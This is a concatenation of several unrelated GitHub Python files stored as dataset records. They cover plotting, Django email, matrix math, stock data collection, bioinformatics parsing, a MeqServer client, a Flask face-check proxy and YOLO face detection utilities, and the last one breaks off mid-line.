10)\r\n\r\n df_TEMP_ol = df_TEMP.copy()\r\n pd.options.mode.chained_assignment = None # default='warn'\r\n df_TEMP_ol.loc[:,\"YYWW_datecode\"] = df_list[i].loc[:,\"YYWW_datecode\"]\r\n pd.options.mode.chained_assignment = 'warn' # default='warn'\r\n\r\n #format: [interval_sel, rdsonul, rdsonll, rdsontf, vthul, vthll, vthtf, idofful, idoffll, idofftf, igssul, igssll, igsstf, dir_ent]\r\n default_ran_arr = ['1000', '150', '-50', '5', '50', '-50', '5', '50', '0', '2', '50', '0', '2']\r\n ran_arr = []\r\n if manual:\r\n ran_arr = range_arr.copy()\r\n else:\r\n ran_arr = default_ran_arr.copy()\r\n if c == 'Rdson_aging(%)':\r\n high_range = float(ran_arr[1])\r\n low_range = float(ran_arr[2])\r\n spacing = float(ran_arr[3])\r\n elif c == 'Vth_aging(%)':\r\n high_range = float(ran_arr[4])\r\n low_range = float(ran_arr[5])\r\n spacing = float(ran_arr[6])\r\n elif c == 'Idoff_rise(x)':\r\n high_range = float(ran_arr[7])\r\n low_range = float(ran_arr[8])\r\n spacing = float(ran_arr[9])\r\n elif c == 'Igss_rise(x)':\r\n high_range = float(ran_arr[10])\r\n low_range = float(ran_arr[11])\r\n spacing = float(ran_arr[12])\r\n plt.ylim(low_range, high_range)\r\n plt.yticks(np.arange(low_range, high_range, spacing))\r\n outlier_df_lower = df_TEMP_ol[(df_TEMP_ol[c] < low_range)]\r\n outlier_df_higher = df_TEMP_ol[(df_TEMP_ol[c] > high_range)]\r\n outlier_df = pd.concat([outlier_df_lower, outlier_df_higher])\r\n outlier_df = outlier_df[['YYWW_datecode','device', c]]\r\n if outlier_df.empty == False:\r\n decimals = 2 \r\n outlier_df[c] = outlier_df[c].apply(lambda x: round(x, decimals))\r\n plt.table(cellText=outlier_df.values,colWidths = [0.1]*len(outlier_df.columns),\r\n rowLabels=outlier_df.index,\r\n colLabels=outlier_df.columns,\r\n cellLoc = 'center', rowLoc = 'center',\r\n loc='best')\r\n\r\n # plt.show()\r\n if manual:\r\n plt.savefig(desktop + '\\\\REL_TREND_PLOTS\\\\' + plt_filename + '.png')\r\n else:\r\n plt.savefig('X:\\\\PLC\\\\Prod Docs\\\\Qual\\\\qrw_script\\\\Rel Trend Charts\\\\' + plt_filename + '.png')\r\n plt.close()\r\n pgB.printProgressBar(i + 1, len(df_list), prefix = c + 'Graphs Progress:', suffix = 'Complete', length = 50)\r\n\r\n#natural sort\r\ndef ntSort(input): \r\n convert = lambda text: int(text) if text.isdigit() else text\r\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\r\n return sorted(input, key = alphanum_key)\r\n","repo_name":"Astray909/rel_trend_plots","sub_path":"PythonModules/graph_plotter.py","file_name":"graph_plotter.py","file_ext":"py","file_size_in_byte":10034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4435840972","text":"from django.core.mail import send_mail\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\n\ndef send_article_email(article, user):\n subject = f'Новая статья в категории {article.category.name}'\n html_message = render_to_string('mail/new_article.html', {'article': article})\n plain_message = strip_tags(html_message)\n send_mail(subject, plain_message, 'your_email@example.com', [user.email], html_message=html_message)\n\n\ndef send_weekly_articles_email(category, articles, user):\n subject = f'Новые статьи в категории {category.name}'\n html_message = render_to_string('mail/weekly_articles.html', {'category': category, 'articles': articles})\n plain_message = strip_tags(html_message)\n send_mail(subject, plain_message, 'your_email@example.com', [user.email], html_message=html_message)\n","repo_name":"dodu204/News_Portal_D9.5.4","sub_path":"news_portal/news_app/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18451402604","text":"\"\"\"\nA matrix will be an N sized list of 4 element lists.\nEach individual list will represent an [x, y, z, 1] point.\nFor multiplication purposes, consider the lists like so:\nx0 x1 xn\ny0 y1 yn\nz0 z1 ... zn\n1 1 1\n\"\"\"\nimport math\n\n#print the matrix such that it looks like\n#the template in the top comment\ndef print_matrix( matrix ):\n s = \"\"\n for i in range(4):\n for point in matrix:\n s = s + str(float(point[i])) + \" \"\n s = s + \"\\n\"\n print(s)\n\n#turn the paramter matrix into an identity matrix\n#you may assume matrix is square\ndef ident( matrix ):\n side = len(matrix)\n for i in range(side):\n matrix[i][i] = 1.000\n for r in range(side):\n for c in range(side):\n if r !=c :\n matrix[r][c] = 0\n\n#multiply m1 by m2, modifying m2 to be the product\n#m1 * m2 -> m2\ndef matrix_mult( m1, m2 ):\n for r in range(len(m2)):\n m2[r] = multi_helper(m1, m2[r])\n\ndef multi_helper(m1, m2 ):\n final = []\n for i in range(len(m1)):\n sum = 0\n for c in range(len(m1[0])):\n sum = sum + (m1[c][i] * m2[c])\n final.append(sum)\n return final\n\n\ndef new_matrix(rows = 4, cols = 4):\n m = []\n for c in range( cols ):\n m.append( [] )\n for r in range( rows ):\n m[c].append( 0 )\n return m\n","repo_name":"vivianhuynh91827/02matrix","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39710962297","text":"import numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nimport tradepy\nfrom tradepy import LOG\nfrom tradepy.depot.stocks import StocksDailyBarsDepot, StockListingDepot\nfrom tradepy.collectors.base import DayBarsCollector\n\n\nclass StockDayBarsCollector(DayBarsCollector):\n bars_depot_class = StocksDailyBarsDepot\n listing_depot_class = StockListingDepot\n\n def _compute_mkt_cap_percentile_ranks(self, df: pd.DataFrame):\n for _, day_df in tqdm(df.groupby(level=\"timestamp\")):\n if (\"mkt_cap_rank\" in day_df) and (day_df[\"mkt_cap_rank\"].notnull().all()):\n yield day_df\n continue\n\n mkt_cap_lst = [row.mkt_cap for row in day_df.itertuples()]\n\n mkt_cap_percentiles = np.percentile(mkt_cap_lst, q=range(100))\n day_df[\"mkt_cap_rank\"] = [\n (mkt_cap_percentiles < v).sum() / len(mkt_cap_percentiles)\n for v in mkt_cap_lst\n ]\n yield day_df\n\n def run(self, batch_size=50, iteration_pause=5):\n LOG.info(\"=============== 开始更新个股日K数据 ===============\")\n jobs = list(self.jobs_generator())\n\n results_gen = self.run_batch_jobs(\n jobs,\n batch_size,\n iteration_pause=iteration_pause,\n fun=tradepy.ak_api.get_stock_daily,\n )\n for args, bars_df in results_gen:\n if bars_df.empty:\n LOG.info(f\"找不到{args['code']}日K数据. Args = {args}\")\n else:\n code = args[\"code\"]\n self.repo.append(bars_df, f\"{code}.csv\")\n\n LOG.info(\"计算个股的每日市值分位\")\n df = self.repo.load(index_by=\"timestamp\", fields=\"all\")\n df = pd.concat(self._compute_mkt_cap_percentile_ranks(df))\n df.reset_index(inplace=True, drop=True)\n\n LOG.info(\"保存中\")\n for code, sub_df in df.groupby(\"code\"):\n sub_df.drop(\"code\", axis=1, inplace=True)\n assert isinstance(code, str)\n self.repo.save(sub_df, filename=code + \".csv\")\n","repo_name":"namoshizun/TradePy","sub_path":"tradepy/collectors/stock_day_bars.py","file_name":"stock_day_bars.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"4123741799","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\n\northogroup_df = pd.read_csv(\"orthofinder/Orthogroups/Orthogroups.tsv\", sep=\"\\t\")\nsp1_ortho_df = orthogroup_df[['Orthogroup', 'iphiclides_feisthamelii.pep']]\nsp2_ortho_df = orthogroup_df[['Orthogroup', 'iphiclides_podalirius.pep']]\n\nsp1_ortho_df_split = sp1_ortho_df['iphiclides_feisthamelii.pep'].str.split(', ', expand = True)\nsp1_ortho_df_split['Orthogroup'] = sp1_ortho_df['Orthogroup']\nsp1_ortho_df_melt = sp1_ortho_df_split.melt(id_vars = 'Orthogroup').sort_values(by=['Orthogroup', 'variable'])\nsp1_ortho_df_melt.columns = ['orthogroup','protein_number','protein_name']\n\nsp2_ortho_df_split = sp2_ortho_df['iphiclides_podalirius.pep'].str.split(', ', expand = True)\nsp2_ortho_df_split['Orthogroup'] = sp2_ortho_df['Orthogroup']\nsp2_ortho_df_melt = sp2_ortho_df_split.melt(id_vars = 'Orthogroup').sort_values(by=['Orthogroup', 'variable'])\nsp2_ortho_df_melt.columns = ['orthogroup','orthogroup_protein_number','protein_name']\n\nsco_list = pd.read_csv(\"SCO_list.txt\", header = None)\nsco_list.columns = ['orthogroup']\nsco_list['SCO_index'] = 1\n\nsp1_sco_merge = pd.merge(sp1_ortho_df_melt.mask(sp1_ortho_df_melt.eq('None')).dropna(), sco_list, on = 'orthogroup', how = \"outer\")\nsp2_sco_merge = pd.merge(sp2_ortho_df_melt.mask(sp2_ortho_df_melt.eq('None')).dropna(), sco_list, on = 'orthogroup', how = \"outer\")\n\nwith open(\"sp1_orthogroups.txt\", \"w\") as f:\n sp1_sco_merge.to_csv(f, sep=\"\\t\", index=False, na_rep=\"0\")\n\nwith open(\"sp2_orthogroups.txt\", \"w\") as f:\n sp2_sco_merge.to_csv(f, sep=\"\\t\", index=False, na_rep=\"0\")\n\n# incoporate unit testing to check if SCO in the output file are correct and whether things are missing that should not be\n","repo_name":"samebdon/samparse","sub_path":"scripts/orthogroup_wide_to_long.py","file_name":"orthogroup_wide_to_long.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14585816117","text":"class AnswerType:\n identical = \"identical\"\n reversed = \"reversed\"\n distance_1 = \"distance_1\"\n distance_2 = \"distance_2\"\n distance_3 = \"distance_3\"\n\n\nstimulus_category = [\"male\", \"female\"]\nstimulus_names = {\"male\": [\"Darek\", \"Olek\", \"Wojtek\", \"Edek\", \"Jacek\", \"Bronek\", \"Tomek\", \"Leszek\"],\n \"female\": [\"Hania\", \"Daria\", \"Basia\", \"Zuzia\", \"Olga\", \"Ada\", \"Fela\", \"Klara\"]}\n\nstimulus_types = {\"male\": [{\"lower\": \"niższy niż\", \"higher\": \"wyższy niż\", \"type_name\": \"wzrost\"},\n {\"lower\": \"młodszy niż\", \"higher\": \"starszy niż\", \"type_name\": \"wiek\"},\n {\"lower\": \"chudszy niż\", \"higher\": \"grubszy niż\", \"type_name\": \"masa\"},\n {\"lower\": \"wolniejszy niż\", \"higher\": \"szybszy niż\", \"type_name\": \"szybkosc\"},\n {\"lower\": \"głupszy niż\", \"higher\": \"mądrzejszy niż\", \"type_name\": \"inteligencja\"},\n {\"lower\": \"biedniejszy niż\", \"higher\": \"bogatszy niż\", \"type_name\": \"zamoznosc\"}],\n \"female\": [{\"lower\": \"niższa niż\", \"higher\": \"wyższa niż\", \"type_name\": \"wzrost\"},\n {\"lower\": \"młodsza niż\", \"higher\": \"starsza niż\", \"type_name\": \"wiek\"},\n {\"lower\": \"chudsza niż\", \"higher\": \"grubsza niż\", \"type_name\": \"masa\"},\n {\"lower\": \"wolniejsza niż\", \"higher\": \"szybsza niż\", \"type_name\": \"szybkosc\"},\n {\"lower\": \"głupsza niż\", \"higher\": \"mądrzejsza niż\", \"type_name\": \"inteligencja\"},\n {\"lower\": \"biedniejsza niż\", \"higher\": \"bogatsza niż\", \"type_name\": \"zamoznosc\"}]}\n","repo_name":"cogscilab-experiment-y/Transrel_verbal","sub_path":"code/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72040580327","text":"import sys\nimport atexit\nimport traceback\nfrom Timba.Meq import meqds\n\n# first things first: setup app defaults from here and from\n# command line (this has to go first, as other modules being imported\n# may depend on app_defaults settings)\nfrom Timba.Apps import app_defaults\nif app_defaults.include_gui:\n try:\n from MeqGUI.GUI import meqserver_gui\n from MeqGUI.GUI.meqserver_gui import *\n except ImportError:\n print(\"*** Error importing GUI modules:\");\n pass;\n\n# #-------- update default debuglevels\n# app_defaults.debuglevels.update({\n# 'MeqNode' :2,\n# 'MeqForest' :2,\n# 'MeqSink' :2,\n# 'MeqSpigot' :2,\n# 'MeqVisHandler':2,\n# 'MeqServer' :2,\n# 'meqserver' :1 \n# });\n# \n\n#-------- parse command line\nif __name__ == '__main__':\n app_defaults.parse_argv(sys.argv[1:]);\n\nimport traceback\nimport os\nimport string\nimport time\nfrom Timba import octopussy\nfrom Timba import mequtils\nfrom Timba.pretty_print import PrettyPrinter\nfrom Timba.Apps.multiapp_proxy import multiapp_proxy\nfrom Timba.dmi import *\nfrom Timba.utils import *\nfrom Timba.Meq import meq\n\n\n# default spawn arguments (for spawn=True)\ndefault_spawn = (\"meqserver\");\ndefault_spawn_opt = (\"meqserver-opt\");\ndefault_launch = ();\n\nclass meqserver (multiapp_proxy):\n \"\"\"interface to MeqServer app\"\"\";\n def __init__(self,appid='meqserver',client_id='meqclient',\n spawn=None,opt=False,**kwargs):\n if spawn and isinstance(spawn,bool):\n if opt:\n spawn = default_spawn_opt;\n else:\n spawn = default_spawn;\n # set gui arg\n if 'gui' in kwargs and kwargs['gui'] and not callable(kwargs['gui']):\n kwargs['gui'] = meqserver_gui;\n self._we_track_results = None;\n # init base class \n multiapp_proxy.__init__(self,appid,client_id,spawn=spawn,**kwargs);\n # setup own state\n self._pprint = PrettyPrinter(width=78,stream=sys.stderr);\n # track axis map changes\n self._we_axis_list = self.whenever('axis.list',self._axis_list_handler);\n # if base/gui init() has explicitly disabled result tracking, _we_track_results\n # will be False rather than None\n if self.get_verbose() > 0 and self._we_track_results is None:\n self.dprint(1,'verbose>0: auto-enabling node_result output');\n self.track_results(True);\n self.dprint(1,'you can disable this by calling .track_results(False)');\n \n # define meqserver-specific methods\n def meq (self,command,args=None,wait=None,silent=False):\n \"\"\"sends a meq-command and optionally waits for result.\n wait can be specified in seconds, or True to wait indefinitely.\"\"\";\n command = make_hiid(command);\n payload = record();\n if args is not None:\n payload.args = args;\n # send command and wait for reply\n if wait:\n if isinstance(wait,bool):\n wait = None; # timeout=None means block indefinitely\n if silent:\n self.dprint(0,'warning: both wait and silent specified, ignoring silent flag');\n payload.command_index = self.new_command_index();\n replyname = 'result' + command + payload.command_index;\n self.dprintf(3,'sending command %s with wait\\n',command);\n self.dprint(5,'arguments are ',args);\n self.pause_events();\n self.send_command('command'+command,payload);\n msg = self.await_(replyname,resume=True,timeout=wait);\n return msg.payload;\n # else simply send command\n else: \n self.dprintf(3,'sending command %s with no wait, silent=%d\\n',command,silent);\n self.dprint(5,'arguments are ',args);\n payload.silent = silent;\n self.send_command('command'+command,payload);\n \n # helper function to create a node specification record\n def makenodespec (self,node):\n \"makes an record( containing a node specification\";\n if isinstance(node,str):\n return record(name=node);\n elif isinstance(node,int):\n return record(nodeindex=node);\n else:\n raise TypeError('node must be specified by name or index, have '+str(type(node)));\n\n def createnode (self,initrec,wait=False,silent=False):\n initrec = make_record(initrec);\n return self.meq('Create.Node',initrec,wait=wait,silent=silent);\n \n def getnodestate (self,node,wait=True,sync=False):\n spec = self.makenodespec(node);\n spec.sync = sync;\n return self.meq('Node.Get.State',spec,wait=wait);\n\n def setnodestate (self,node,fields_record,wait=False,sync=True):\n spec = self.makenodespec(node);\n spec.sync = sync;\n spec.state = fields_record;\n return self.meq('Node.Set.State',spec,wait=wait);\n \n def getnodeindex (self,name):\n retval = self.meq('Get.NodeIndex',self.makenodespec(name),wait=True);\n try: return retval.nodeindex;\n except:\n raise ValueError('MeqServer did not return a nodeindex field');\n\n def getnodelist (self,name=True,nodeindex=True,classname=True,children=False):\n rec = record({'name':name,'nodeindex':nodeindex,'class':classname,'children':children});\n return self.meq('Get.Node.List',rec,wait=True);\n \n def execute (self,node,req,wait=False):\n rec = self.makenodespec(node);\n rec.request = req;\n return self.meq('Node.Execute',rec,wait=wait);\n \n def clearcache (self,node,recursive=True,wait=False,sync=True):\n rec = self.makenodespec(node);\n rec.recursive = recursive;\n rec.sync = sync;\n return self.meq('Node.Clear.Cache',rec,wait=wait);\n \n def change_wd (self,path):\n rec = record(cwd=path);\n return self.meq('Set.Cwd',rec,wait=False);\n \n def publish (self,node,wait=False):\n rec = self.makenodespec(node);\n rec.level = 1;\n return self.meq('Node.Set.Publish.Level',rec,wait=wait);\n \n def _event_handler (self,msg):\n \"\"\"Auguments app_proxy._event_handler(), to keep track of forest state\"\"\";\n multiapp_proxy._event_handler(self,msg);\n payload = msg.payload;\n if self.current_server \\\n and getattr(msg,'from') == self.current_server.addr \\\n and isinstance(payload,record):\n # check if message includes update of forest state and/or status\n fstatus = getattr(payload,'forest_status',None);\n fstate = getattr(payload,'forest_state',None);\n # update forest state, if supplied. Merge in the forest status if\n # we also have it\n if fstate is not None:\n if fstatus is not None:\n fstate.update(fstatus);\n meqds.update_forest_state(fstate);\n # no forest state supplied but a status is: merge it in\n elif fstatus is not None:\n meqds.update_forest_state(fstatus,merge=True);\n \n def _result_handler (self,msg):\n try:\n value = msg.payload;\n dprint(0,'============= result for node: ',value.name);\n self._pprint.pprint(value);\n except:\n print('exception in meqserver._result_handler: ',sys.exc_info());\n traceback.print_exc();\n \n def _axis_list_handler (self,msg):\n try:\n if self.current_server \\\n and getattr(msg,'from') == self.current_server.addr: \\\n mequtils.set_axis_list(msg.payload);\n except:\n print('exception in meqserver._axis_list_handler: ',sys.exc_info());\n traceback.print_exc();\n \n def track_results (self,enable=True):\n if enable:\n self.dprint(2,'auto-printing all node_result events');\n if self._we_track_results:\n self._we_track_results.activate();\n else:\n self._we_track_results = self.whenever('node.result',self._result_handler);\n else: # disable\n self.dprint(2,'disabling auto-printing of node_result events');\n if self._we_track_results:\n self._we_track_results.deactivate();\n self._we_track_results = False;\n\nmqs = None;\n\n# inits a meqserver\ndef default_mqs (debug={},nokill=False,extra=None,**kwargs):\n global mqs;\n if not isinstance(mqs,meqserver):\n # create a local tcp port\n gwlocal = \"=meqbatch-%d\"%os.getpid();\n # start octopussy if needed\n if not octopussy.is_initialized():\n octopussy.init(gwclient=False,gwtcp=0,gwlocal=gwlocal+\":1\");\n if not octopussy.is_running():\n octopussy.start(wait=True);\n # start meqserver, overriding default args with any kwargs\n args = record(**app_defaults.args);\n args.update(kwargs);\n # add gwpeer= argument\n if isinstance(extra,str):\n extra = args.extra + extra.split(' ');\n extra = (extra or []) + [\"-gw\",gwlocal];\n spawn = args.get('spawn',None);\n mqs = meqserver(extra=extra,**args);\n mqs.dprint(1,'default meqserver args:',args);\n meqds.set_meqserver(mqs);\n if not nokill:\n atexit.register(stop_default_mqs);\n if debug is None:\n pass;\n else:\n octopussy.set_debug(app_defaults.debuglevels);\n if isinstance(debug,dict):\n octopussy.set_debug(debug);\n return mqs;\n \ndef stop_default_mqs ():\n global mqs;\n if mqs: \n if mqs.current_server:\n mqs.dprint(1,\"stopping default meqserver\");\n mqs.halt();\n mqs.disconnect();\n # kill process if it is still running after 10 seconds\n if mqs.serv_pid:\n for i in range(20):\n pid,stat = os.waitpid(mqs.serv_pid,os.WNOHANG);\n if pid:\n break;\n mqs.dprint(0,\"meqserver not exited yet, waiting another 10 seconds\");\n time.sleep(10);\n else:\n mqs.dprint(0,\"meqserver not exiting cleanly after 200 seconds, killing it\");\n os.kill(mqs.serv_pid,9);\n pid,stat = os.waitpid(mqs.serv_pid,os.WNOHANG);\n mqs = None;\n if octopussy.is_running():\n octopussy.stop();\n \n \n#\n# self-test block\n#\nif __name__ == '__main__':\n app_defaults.parse_argv(sys.argv[1:]);\n gui = app_defaults.args['gui'];\n\n default_mqs(verbose=2,wp_verbose=2);\n for i in range(1,10):\n print('createnode:',mqs.createnode(meq.node('MeqConstant','x'+str(i),value=0),wait=False));\n\n if gui:\n mqs.run_gui(); \n else:\n time.sleep(2);\n\n print('================= stopping mqs');\n mqs.halt();\n mqs.disconnect();\n\n print(\"===== calling octopussy.stop() =====\");\n octopussy.stop();\n\n","repo_name":"ratt-ru/meqtrees-timba","sub_path":"PyApps/src/Apps/meqserver.py","file_name":"meqserver.py","file_ext":"py","file_size_in_byte":9902,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"4046608732","text":"from flask import Flask,render_template,request\nfrom urllib import request as req,parse\nimport ssl\nssl._create_default_https_context=ssl._create_unverified_context\napp=Flask(__name__)\n# 首页对应的页面\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n# 采集的数据送往的地址\n@app.route(\"/send\",methods=[\"POST\"])\ndef send():\n data=parse.urlencode(request.form).encode(\"utf8\")\n print(data)\n res=req.urlopen(\"https://118.190.150.35:5000/api/photo\",data=data)\n con=res.read()\n print(con)\n return con\n\n# 要对比的地址\n@app.route(\"/check\",methods=[\"POST\"])\ndef check():\n data=parse.urlencode(request.form).encode(\"utf8\")\n print(data)\n res=req.urlopen(\"https://118.190.150.35:5000/api/check\",data=data)\n con=res.read()\n print(con)\n return con\napp.run()","repo_name":"yueyingjun/changzhi_face","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71809745129","text":"file = open(\"Day9-1.txt\", \"r\")\nf = file.read()\nlines = f.split('\\n')\nnums = []\nfor line in lines:\n nums.append(int(line))\n\n\npreambleLength = 25\n\nfor i in range(preambleLength, len(nums)):\n preamble = nums[i-preambleLength:i]\n preamble.sort()\n li = 0\n hi = preambleLength - 1\n valid = False\n while li != hi:\n if nums[i] > preamble[li] + preamble[hi]:\n li+=1\n continue\n if nums[i] < preamble[li] + preamble[hi]:\n hi-=1\n continue\n if nums[i] == preamble[li] + preamble[hi]:\n valid = True\n break\n if not valid:\n print(\"----------\")\n print(preamble)\n print(nums[i])","repo_name":"luke-leonard/CodeAdvent","sub_path":"2020/Day09/Day9-1.py","file_name":"Day9-1.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11607555757","text":"import cv2\nimport numpy as np\nimport torch\nimport math\nimport os\nimport random\nimport time\nimport torchvision\n\ndef xywh2xyxy(x):\n # Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right\n y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)\n y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x\n y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y\n y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x\n y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y\n return y\n\ndef xyxy2xywh(x):\n # Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right\n y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)\n y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center\n y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center\n y[:, 2] = x[:, 2] - x[:, 0] # width\n y[:, 3] = x[:, 3] - x[:, 1] # height\n return y\n\ndef letterbox(img, new_shape=640, color=(114, 114, 114), auto=True, scaleup=True):\n # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232\n shape = img.shape[:2] # current shape [height, width]\n\n # Scale ratio (new / old)\n r = min(new_shape / shape[0], new_shape / shape[1])\n if not scaleup: # only scale down, do not scale up (for better test mAP)\n r = min(r, 1.0)\n\n # Compute padding\n new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))\n dw, dh = new_shape - new_unpad[0], new_shape - new_unpad[1] # wh padding\n if auto: # minimum rectangle\n dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding\n\n dw /= 2 # divide padding into 2 sides\n dh /= 2\n\n if shape[::-1] != new_unpad: # resize\n img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border\n return img\n\ndef make_grid(nx=20, ny=20):\n yv, xv = torch.meshgrid([torch.arange(ny), torch.arange(nx)])\n grid_stack = torch.stack((xv, yv), 2)\n grid_stack = grid_stack.view((1, 1, ny, nx, 2)).float()\n return grid_stack\n\ndef YoloFaceOutputProcess(outs, face_config, not_yaml=True, yaml_ancors=[]):\n strides = face_config.strides\n na = face_config.nanchors\n no = face_config.classes + 5 + 10\n fmNum = len(outs)\n anchors = []\n if not_yaml:\n anchors = face_config.face_anchors4\n else:\n anchors = yaml_ancors\n anchors = torch.tensor(np.array(anchors, dtype=np.float32)).view(fmNum, -1, 2)\n anchor_grid = anchors.clone().view(fmNum, 1, -1, 1, 1, 2)\n\n pouts = []\n for i in range(fmNum):\n pre_out = outs[i]\n devi = pre_out.device\n\n if not_yaml:\n nbatch, nchannel, nh, nw = pre_out.shape\n pre_out = pre_out.view(nbatch, na, no, nh, nw)\n pre_out = pre_out.permute(0, 1, 3, 4, 2).contiguous() # b 3 40 40 16\n # pre_out: xywh, conf(iou), landms, classid\n nbatch, na, nh, nw, no = pre_out.shape\n fp_grid = make_grid(nx=nw, ny=nh).to(devi)\n\n y = torch.full_like(pre_out, 0)\n y[..., [0, 1, 2, 3, 4, 15]] = pre_out[..., [0, 1, 2, 3, 4, 15]].sigmoid()\n y[..., 5:15] = pre_out[..., 5:15]\n\n y[..., 0:2] = (y[..., 0:2] * 2. - 0.5 + fp_grid) * strides[i] # xy\n y[..., 2:4] = (y[..., 2:4] * 2) ** 2 * anchor_grid[i] # wh\n\n y[..., 5:7] = y[..., 5:7] * anchor_grid[i] + fp_grid * strides[i] # landmark x1 y1\n y[..., 7:9] = y[..., 7:9] * anchor_grid[i] + fp_grid * strides[i] # landmark x2 y2\n y[..., 9:11] = y[..., 9:11] * anchor_grid[i] + fp_grid * strides[i] # landmark x3 y3\n y[..., 11:13] = y[..., 11:13] * anchor_grid[i] + fp_grid * strides[i] # landmark x4 y4\n y[..., 13:15] = y[..., 13:15] * anchor_grid[i] + fp_grid * strides[i] # landmark x5 y5\n\n pouts.append(y.view(nbatch, -1, no))\n\n z = torch.cat(pouts, 1)\n return z\n\ndef YoloFaceNMS(prediction, conf_thres=0.25, iou_thres=0.45):\n nc = prediction.shape[2] - 15 # number of classes\n xc = prediction[..., 4] > conf_thres # candidates\n\n # Settings\n min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height\n time_limit = 10.0 # seconds to quit after\n redundant = True # require redundant detections\n multi_label = nc > 1 # multiple labels per box (adds 0.5ms/img)\n merge = False # use merge-NMS\n t = time.time()\n output = [torch.zeros((0, 16), device=prediction.device)] * prediction.shape[0]\n\n for xi, x in enumerate(prediction):\n x = x[xc[xi]]\n # If none remain process next image\n if not x.shape[0]:\n continue\n\n # Compute conf\n x[:, 15:] *= x[:, 4:5] # conf = obj_conf * cls_conf\n # Box (center x, center y, width, height) to (x1, y1, x2, y2)\n box = xywh2xyxy(x[:, :4])\n\n # Detections matrix nx6 (xyxy, conf, landmarks, cls)\n if multi_label:\n i, j = (x[:, 15:] > conf_thres).nonzero(as_tuple=False).T\n x = torch.cat((box[i], x[i, j + 15, None], x[:, 5:15], j[:, None].float()), 1)\n else: # best class only\n conf, j = x[:, 15:].max(1, keepdim=True)\n x = torch.cat((box, conf, x[:, 5:15], j.float()), 1)[conf.view(-1) > conf_thres]\n\n # If none remain process next image\n n = x.shape[0] # number of boxes\n if not n:\n continue\n\n # Batched NMS\n c = x[:, 15:16] * max_wh # classes\n boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores\n i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS\n if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)\n # update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)\n iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix\n weights = iou * scores[None] # box weights\n x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes\n if redundant:\n i = i[iou.sum(1) > 1] # require redundancy\n\n output[xi] = x[i]\n if (time.time() - t) > time_limit:\n break # time limit exceeded\n return output\n\ndef scale_coords_boxes(img1_shape, coords, img0_shape, ratio_pad=None):\n # Rescale coords (xyxy) from img1_shape to img0_shape\n if ratio_pad is None: # calculate from img0_shape\n gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new\n pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding\n else:\n gain = ratio_pad[0][0]\n pad = ratio_pad[1]\n\n coords[:, [0, 2]] -= pad[0] # x padding\n coords[:, [1, 3]] -= pad[1] # y padding\n coords[:, :4] /= gain\n clip_coords(coords, img0_shape)\n return coords\n\ndef scale_coords_landmarks(img1_shape, coords, img0_shape, ratio_pad=None):\n # Rescale coords (xyxy) from img1_shape to img0_shape\n if ratio_pad is None: # calculate from img0_shape\n gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new\n pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding\n else:\n gain = ratio_pad[0][0]\n pad = ratio_pad[1]\n\n coords[:, [0, 2, 4, 6, 8]] -= pad[0] # x padding\n coords[:, [1, 3, 5, 7, 9]] -= pad[1] # y padding\n coords[:, :10] /= gain\n coords[:, 